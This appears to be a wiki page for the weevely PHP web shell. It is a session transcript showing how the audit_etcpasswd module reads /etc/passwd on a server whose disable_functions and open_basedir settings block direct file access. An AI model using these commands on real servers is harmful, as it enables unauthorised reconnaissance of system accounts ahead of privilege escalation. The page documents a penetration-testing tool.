Skip to content

Get etc passwd content with no read access

Jump to bottom
epinna edited this page Sep 20, 2014 · 1 revision

Certain PHP configurations prevent the execution of external shell commands (with disable_functions) and preventing the escape from the web root folder (see open_basedir). This avoids any direct access to any system files useful to gather more information to conduct any privilege escalation attack as /etc/passwd.

The module audit_etcpasswd will print the /etc/passwd contents without reading it.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system and open_basedir = /var/www/html/
  • Used modules: audit_etcpasswd

Session

No external shell commands are available here, due to the only available shell is the PHP interpreter. Try to access directly to the target file.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_1.session
[+] Shell:	PHP interpreter

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

www-data@target:/var/www/html PHP> cd /etc
[-][cd] Failed cd '/etc': no such directory or permission denied
www-data@target:/var/www/html PHP> cat /etc/passwd
[-][download] File download failed, please check remote path and permissions

No direct access is possible. Anyway the module audit_etcpasswd can enumerate the users entries.

www-data@target:/var/www/html PHP> :audit_etcpasswd --help
usage: audit_etcpasswd [-h] [-real]
                       [-vector {posix_getpwuid,file,fread,file_get_contents,base64}]

Get /etc/passwd with different techniques.

optional arguments:
  -h, --help            show this help message and exit
  -real                 Filter only real users
  -vector {posix_getpwuid,file,fread,file_get_contents,base64}

www-data@target:/var/www/html PHP> :audit_etcpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
yzer:x:1000:1000:yzer,,,:/home/yzer:/bin/bash
www-data@target:/var/www/html PHP>

And the /etc/passwd content has been extracted anyway.

Clone this wiki locally